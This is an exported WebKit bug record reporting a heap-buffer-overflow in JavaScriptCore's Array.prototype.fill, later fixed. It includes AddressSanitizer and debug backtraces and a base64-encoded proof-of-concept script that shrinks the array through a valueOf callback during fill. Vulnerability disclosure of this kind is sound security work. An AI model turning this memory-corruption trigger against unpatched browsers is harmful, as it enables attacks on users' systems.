285393 2025-01-04 19:46:40 -0800 [JSC] heap-buffer-overflow on WebKit/Source/JavaScriptCore/runtime/WriteBarrier.h:166:17 2025-01-07 20:06:46 -0800 1 1 1 Unclassified WebKit JavaScriptCore WebKit Local Build Unspecified Unspecified RESOLVED FIXED InRadar P2 Normal --- 1 rhezashan ysuzuki bfulgham webkit-bug-importer ysuzuki oldest_to_newest 2084890 0 473776 rhezashan 2025-01-04 19:46:40 -0800 Created attachment 473776 poc.js 1. Tested on Webkit branch main 2. Target release - crashes 3. Target debug - crashes 4. Run with `./bin/jsc ./poc.js` # commit @main ``` commit b3809e07dc65e5678706c3ee334ca12930ebf129 (HEAD -> main, origin/main, origin/HEAD) Author: Rob Buis <rbuis@igalia.com> Date: Sat Jan 4 12:19:18 2025 -0800 ``` # Error stack release target ``` ================================================================= ==437170==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x52d000023ff8 at pc 0x601974d9c81b bp 0x7fff5fcecb30 sp 0x7fff5fcecb28 WRITE of size 16 at 0x52d000023ff8 thread T0 #0 0x601974d9c81a in JSC::WriteBarrierBase<JSC::Unknown, WTF::RawValueTraits<JSC::Unknown>>::setWithoutWriteBarrier(JSC::JSValue) /home/rheza/WebKit/Source/JavaScriptCore/runtime/WriteBarrier.h:166:17 #1 0x601974d9c81a in JSC::ContiguousData<JSC::WriteBarrier<JSC::Unknown, WTF::RawValueTraits<JSC::Unknown>>>::Data::setWithoutWriteBarrier(JSC::JSValue const&) /home/rheza/WebKit/Source/JavaScriptCore/runtime/Butterfly.h:87:20 #2 0x601974d9c81a in JSC::JSArray::fastFill(JSC::VM&, unsigned int, unsigned int, JSC::JSValue) /home/rheza/WebKit/Source/JavaScriptCore/runtime/JSArray.cpp:520:43 #3 0x601974a2c8a7 in JSC::arrayProtoFuncFill(JSC::JSGlobalObject*, JSC::CallFrame*) /home/rheza/WebKit/Source/JavaScriptCore/runtime/ArrayPrototype.cpp:1946:20 #4 0x7e9f7ca10037 (<unknown module>) 0x52d000024000 is located 0 bytes after 16384-byte region [0x52d000020000,0x52d000024000) allocated by thread T0 here: #0 0x601972083606 in aligned_alloc (/home/rheza/WebKit/webkit-clang-main-release/bin/jsc+0xcf9606) (BuildId: 38bf8325b8192e73) #1 0x60197639e884 in pas_debug_heap_allocate(unsigned long, unsigned long, pas_allocation_mode) /home/rheza/WebKit/webkit-clang-main-release/bmalloc/Headers/bmalloc/pas_debug_heap.h:102:22 #2 0x60197639bdd5 in bmalloc_try_allocate_with_alignment_impl(unsigned long, unsigned long, pas_allocation_mode) /home/rheza/WebKit/webkit-clang-main-release/bmalloc/Headers/bmalloc/bmalloc_heap_inlines.h:59:1 #3 0x60197639bdd5 in bmalloc_try_allocate_with_alignment_inline(unsigned long, unsigned long, pas_allocation_mode) /home/rheza/WebKit/webkit-clang-main-release/bmalloc/Headers/bmalloc/bmalloc_heap_inlines.h:104:19 #4 0x60197639bdd5 in bmalloc::api::tryMemalign(unsigned long, unsigned long, bmalloc::CompactAllocationMode, bmalloc::HeapKind) /home/rheza/WebKit/webkit-clang-main-release/bmalloc/Headers/bmalloc/bmalloc.h:124:16 #5 0x60197639bdd5 in WTF::tryFastCompactAlignedMalloc(unsigned long, unsigned long) /home/rheza/WebKit/Source/WTF/wtf/FastMalloc.cpp:780:20 #6 0x601973f4442e in JSC::LocalAllocator::allocate(JSC::Heap&, unsigned long, JSC::GCDeferralContext*, JSC::AllocationFailureMode)::'lambda'()::operator()() const /home/rheza/WebKit/Source/JavaScriptCore/heap/LocalAllocatorInlines.h:41:43 #7 0x601973f4442e in JSC::HeapCell* JSC::FreeList::allocateWithCellSize<JSC::LocalAllocator::allocate(JSC::Heap&, unsigned long, JSC::GCDeferralContext*, JSC::AllocationFailureMode)::'lambda'()>(JSC::LocalAllocator::allocate(JSC::Heap&, unsigned long, JSC::GCDeferralContext*, JSC::AllocationFailureMode)::'lambda'() const&, unsigned long) /home/rheza/WebKit/Source/JavaScriptCore/heap/FreeListInlines.h:46:16 #8 0x601973f4442e in JSC::LocalAllocator::allocate(JSC::Heap&, unsigned long, JSC::GCDeferralContext*, JSC::AllocationFailureMode) /home/rheza/WebKit/Source/JavaScriptCore/heap/LocalAllocatorInlines.h:38:23 #9 0x601973f4442e in JSC::Allocator::allocate(JSC::Heap&, unsigned long, JSC::GCDeferralContext*, JSC::AllocationFailureMode) const /home/rheza/WebKit/Source/JavaScriptCore/heap/AllocatorInlines.h:35:30 #10 0x601973f4442e in JSC::CompleteSubspace::tryAllocateSlow(JSC::VM&, unsigned long, JSC::GCDeferralContext*) /home/rheza/WebKit/Source/JavaScriptCore/heap/CompleteSubspace.cpp:122:26 #11 0x601973f43d78 in JSC::CompleteSubspace::allocateSlow(JSC::VM&, unsigned long, JSC::GCDeferralContext*, JSC::AllocationFailureMode) /home/rheza/WebKit/Source/JavaScriptCore/heap/CompleteSubspace.cpp:108:20 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/rheza/WebKit/Source/JavaScriptCore/runtime/WriteBarrier.h:166:17 in JSC::WriteBarrierBase<JSC::Unknown, WTF::RawValueTraits<JSC::Unknown>>::setWithoutWriteBarrier(JSC::JSValue) Shadow bytes around the buggy address: 0x52d000023d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x52d000023d80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x52d000023e00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x52d000023e80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x52d000023f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x52d000023f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[00] 0x52d000024000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x52d000024080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x52d000024100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x52d000024180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x52d000024200: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==437170==ABORTING ``` # Error stack on debug target ``` ASSERTION FAILED: index < m_length /home/rheza/WebKit/Source/JavaScriptCore/runtime/ButterflyInlines.h(48) : typename ContiguousData<T>::Data JSC::ContiguousData<JSC::WriteBarrier<Unknown, RawValueTraits<Unknown>>>::at(const JSCell *, size_t) [T = JSC::WriteBarrier<Unknown, RawValueTraits<Unknown>>] 1 0x56ea78a0ff04 WTFReportBacktrace 2 0x56ea73fdb9b3 JSC::ContiguousData<JSC::WriteBarrier<JSC::Unknown, WTF::RawValueTraits<JSC::Unknown> > >::at(JSC::JSCell const*, unsigned long) 3 0x56ea7739a257 JSC::JSArray::fastFill(JSC::VM&, unsigned int, unsigned int, JSC::JSValue) 4 0x56ea76f813a1 JSC::arrayProtoFuncFill(JSC::JSGlobalObject*, JSC::CallFrame*) 5 0x7428dba10038 ??? Aborted (core dumped) ``` 2084891 1 webkit-bug-importer 2025-01-04 19:46:50 -0800 <rdar://problem/142369820> 2085680 2 ysuzuki 2025-01-07 19:10:52 -0800 ToT crash. 2085681 3 ysuzuki 2025-01-07 19:12:41 -0800 Pull request: https://github.com/WebKit/WebKit/pull/38698 2085688 4 ews-feeder 2025-01-07 20:06:44 -0800 Committed 288578@main (c702978087bc): <https://commits.webkit.org/288578@main> Reviewed commits have been landed. Closing PR #38698 and removing active labels. 473776 2025-01-04 19:46:40 -0800 2025-01-04 19:46:40 -0800 poc.js poc_us_1_output_3_crashes_0.js text/javascript 217 rhezashan Y29uc3QgdjAgPSBbXTsKZm9yIChsZXQgaTIgPSAwOyBpMiA8IDEwMDAwMDA7IGkyKyspIHsKICAg IHYwW2kyXSA9IFtdOwp9CmNvbnN0IHYxMCA9IG5ldyBPYmplY3QoT2JqZWN0LCB2MCk7CmZ1bmN0 aW9uIGYxMSgpIHsKICAgIHYwLmxlbmd0aCA9IDA7CiAgICByZXR1cm4gMDsKfQpjb25zdCBvMTQg PSB7CiAgICAidmFsdWVPZiI6IGYxMSwKfTsKdjAuZmlsbCh2MTAsIG8xNCk7Cg==